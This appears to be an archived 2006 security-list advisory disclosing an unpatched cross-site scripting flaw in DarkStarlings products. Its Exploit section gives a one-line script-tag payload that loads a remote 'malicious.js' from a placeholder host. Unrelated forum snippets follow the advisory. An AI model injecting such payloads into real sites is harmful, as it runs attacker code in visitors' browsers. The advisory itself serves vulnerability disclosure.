DarkStarlings.com XSS Vulnerability

From: Will Boyce <mail@xxxxxxxxxxxxx>
Date: Mon, 6 Feb 2006 01:10:27 +0000

--------------------Summary----------------
Vendor: DarkStarlings
Vendor's Web Site: http://www.darkstarlings.com/
Software: All products
Versions: All versions
Critical Level: Moderate
Type: Cross-Site Scripting
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Will Boyce (mail@xxxxxxxxxxxxx)

-----------------Description---------------
Arbitrary script code insertion is possible in <script> tags
<script> tag isn't properly sanitized. This can be used to post
arbitrary script code.

--------------Exploit----------------------
<script language="text/javascript" src="http://url/malicious.js";>

--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: Will Boyce (mail@xxxxxxxxxxxxx)
--
Regards, Will Boyce.
http://willboyce.com

Prev by Date: [ GLSA 200602-01 ] GStreamer FFmpeg plugin: Heap-based buffer overflow
Next by Date: [SECURITY] [DSA 965-1] New ipsec-tools packages fix denial of service
Previous by thread: [ GLSA 200602-01 ] GStreamer FFmpeg plugin: Heap-based buffer overflow
Next by thread: Re: DarkStarlings.com XSS Vulnerability
Index(es):
- Date
- Thread

Relevant Pages

Re: A serious question about cgi (intermediate-newbie)
... If so, your script ... period of time because of nested table tags. ... What I find effective is collecting log entries for an offender ... call his employer, have your favorite attorney write his employer. ...
(comp.lang.perl.misc)
Re: IE , SCRIPT and innerHTML
... the way you are trying to alert it. ... Anyone know a solution to access the contents of the script tag in IE? ... Prototype.js was written by people who don't know javascript for people ... I need the script tags, so that i can create different field ...
(comp.lang.javascript)
Re: why does this simple counter fail?
... Look for short tags. ... On Mar 25, 2011, at 12:36 AM, Gary Kline wrote: ... hack with no error-checking is that i have used the same script ... PHP), not a shared lock. ...
(freebsd-questions)
Re: asp.net and XHTML
... tags, and attribute values are included in double ... Controls do not render custom attributes that are ... Any script tags rendered into the page include an appropriate type ...
(microsoft.public.dotnet.framework.aspnet)
Site search script?
... I'm looking for a script which will search a set of text files and return ... The text files are books and short stories, ... locally and uploaded to the host server) would get around this, ... with tags okay? ...
(alt.php)